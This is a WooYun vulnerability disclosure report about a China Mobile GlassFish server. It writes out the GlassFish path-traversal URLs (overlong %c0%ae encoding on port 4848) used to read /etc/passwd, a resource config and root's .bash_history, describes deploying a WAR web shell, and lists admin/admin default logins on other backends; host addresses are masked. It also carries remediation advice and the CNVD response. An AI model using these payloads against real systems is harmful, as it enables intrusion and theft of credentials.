当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0188241

漏洞标题:中国移动某服务器Glassfish任意文件读取(已Getshell涉及BAT等大型互联网公司的流量统计)

相关厂商:中国移动

漏洞作者: 路人甲

提交时间:2016-03-24 12:10

修复时间:2016-05-12 15:18

公开时间:2016-05-12 15:18

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-24: 细节已通知厂商并且等待厂商处理中
2016-03-28: 厂商已经确认,细节仅向厂商公开
2016-04-07: 细节向核心白帽子及相关领域专家公开
2016-04-17: 细节向普通白帽子公开
2016-04-27: 细节向实习白帽子公开
2016-05-12: 细节向公众公开

简要描述:

中国移动某服务器Glassfish任意文件读取(已Getshell涉及BAT等大型互联网公司的流量统计)

详细说明:

用F-MiddlewareScan扫了个移动的段,虽然没有什么可利用的,破解什么的也没成功.
但凑巧看到有Glassfish

QQ图片20160323185823.png


**.**.**.**:4848
试了很多弱口令都没用
想了下,现在不是有个任意文件读取么

**.**.**.**:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd


果真有,还是ROOT权限

QQ图片20160323185949.png


翻了半天只翻到数据库信息,以及可以下载WAR包而已,没什么实际利用

**.**.**.**:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/home/glassfish/domains/domain1/applications/glassfish-resources.xml


QQ图片20160323190137.png


翻了2个多小时未果,翻看乌云大量漏洞,终于从猪猪侠的漏洞里发现,可以从.bash_history看到管理员设置密码的记录.

**.**.**.**:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/root/.bash_history


运气还真好

QQ图片20160323190320.png

漏洞证明:

接下来就是部署WAR啦.....

QQ图片20160323190419.png


QQ图片20160323190455.jpg


QQ图片20160323190519.png


QQ图片20160323190543.png


还发现了一个管理后台弱口令

**.**.**.**:8888/accounts/login/?next=/


admin/admin

QQ图片20160323191028.png


另一个后台

QQ图片20160323191405.png


**.**.**.**:8080/iqaweb/


QQ图片20160323190746.png


QQ图片20160323190940.png


**.**.**.**:7180/cmf/
admin/admin

1.jpg


2.jpg


还有个目录遍历
**.**.**.**/lzo/

修复方案:

修改口令
删除shell文件 cs.war
升级Glassfish版本

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-03-28 15:18

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无